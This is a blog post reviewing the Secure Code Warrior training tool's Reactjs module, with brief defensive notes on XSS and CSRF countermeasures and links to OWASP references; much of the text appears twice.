You are the Secure Code Warrior
Opentable has provided it's engineers access to a tool called Secure Code Warrior to practice and learn secure coding best practices.
There are various modules for different tech stacks. I'm taking the Reactjs module.
Secure Code Warrior is a pretty cool interface. It presents scenarios as games. Attackers from all over the world are attacking your systems and you have to save the day. Gamification. I like it.
You are tasked with fixing code that has one or more security holes. Below is a snapshot of the interface. Pretty cool. All that's missing is the Defcon countdown audio.
Some of the Training questions and examples are unclear to understand what's needed. I'd appreciate a (better) introduction first for each security vulnerability before jumping straight into coding tests.
Myself and others ended up repeating the same section because the UX of the tool is confusing. When a section is done don't hit "Continue", that means keep doing same section. Instead pay attention to the correct button to press to end that section and move on to a new section.
And some of the Reactjs code is just not how Reactjs is typically written. Mixing in different ways to update dom browser apis, jquery as well as jsx. Plus a lot of use of dangerouslySetInnerHTML. I think we've only used that once in years.
I heard from people who took the Java course of similar outdated/weird looking code.
BUT this is useful and raises awareness. I'd like to use the tool more, on a regular basis.
Useful References and notes
Use this: https://www.npmjs.com/package/sanitize-html
https://owasp.org/www-community/attacks/xss/
https://portswigger.net/web-security/csrf
https://owasp.org/www-project-cheat-sheets/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet
https://owasp.org/www-project-cheat-sheets/cheatsheets/Session_Management_Cheat_Sheet
https://blog.rapid7.com/2017/06/15/about-user-enumeration/
https://owasp.org/www-project-cheat-sheets/cheatsheets/AJAX_Security_Cheat_Sheet
Cross site scripting (xss) is a type of injection attack where malicious scripts or code are injected. An attacker uses the site to send malicious code to another user who inadvertently runs the code which could steal data or redirect to another site.
Countermeasures: validating input, encoding before displaying. Stop scripts or code getting in.
Sometimes forgotten is the first true line of defense is the api used by the frontend. It's not enough to check in the browser, you have to also sanitize at the edge api because attackers can easily bypass the UI and hit the api directly.
Persistent xss is a variation that occurs when the malicious code is saved on the server,.
Cross Site Request Forgery (CSRF) is an attack where a user is induced to perform an action they did not intend to perform.
For the attack to succeed 3 elements must be in place:
The most common countermeasure is to introduce a random element which cannot be known to the attacker. A CSRF token is recommended and commonly used. The technique of asking for current password to change old password is another example. Requiring re-authentication is also used.
There are various modules for different tech stacks. I'm taking the Reactjs module.
Secure Code Warrior is a pretty cool interface. It presents scenarios as games. Attackers from all over the world are attacking your systems and you have to save the day. Gamification. I like it.
You are tasked with fixing code that has one or more security holes. Below is a snapshot of the interface. Pretty cool. All that's missing is the Defcon countdown audio.
Some of the Training questions and examples are unclear to understand what's needed. I'd appreciate a (better) introduction first for each security vulnerability before jumping straight into coding tests.
Myself and others ended up repeating the same section because the UX of the tool is confusing. When a section is done don't hit "Continue", that means keep doing same section. Instead pay attention to the correct button to press to end that section and move on to a new section.
And some of the Reactjs code is just not how Reactjs is typically written. Mixing in different ways to update dom browser apis, jquery as well as jsx. Plus a lot of use of dangerouslySetInnerHTML. I think we've only used that once in years.
I heard from people who took the Java course of similar outdated/weird looking code.
BUT this is useful and raises awareness. I'd like to use the tool more, on a regular basis.
Useful References and notes
Use this: https://www.npmjs.com/package/sanitize-html
https://owasp.org/www-community/attacks/xss/
https://portswigger.net/web-security/csrf
https://owasp.org/www-project-cheat-sheets/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet
https://owasp.org/www-project-cheat-sheets/cheatsheets/Session_Management_Cheat_Sheet
https://blog.rapid7.com/2017/06/15/about-user-enumeration/
https://owasp.org/www-project-cheat-sheets/cheatsheets/AJAX_Security_Cheat_Sheet
Cross site scripting (xss) is a type of injection attack where malicious scripts or code are injected. An attacker uses the site to send malicious code to another user who inadvertently runs the code which could steal data or redirect to another site.
Countermeasures: validating input, encoding before displaying. Stop scripts or code getting in.
Sometimes forgotten is the first true line of defense is the api used by the frontend. It's not enough to check in the browser, you have to also sanitize at the edge api because attackers can easily bypass the UI and hit the api directly.
Persistent xss is a variation that occurs when the malicious code is saved on the server,.
Cross Site Request Forgery (CSRF) is an attack where a user is induced to perform an action they did not intend to perform.
For the attack to succeed 3 elements must be in place:
- cookie based session handling (no other mechanism)
- no unknown or random element
- an important action such as a privileged action e.g. change users email
The most common countermeasure is to introduce a random element which cannot be known to the attacker. A CSRF token is recommended and commonly used. The technique of asking for current password to change old password is another example. Requiring re-authentication is also used.
Comments
Post a Comment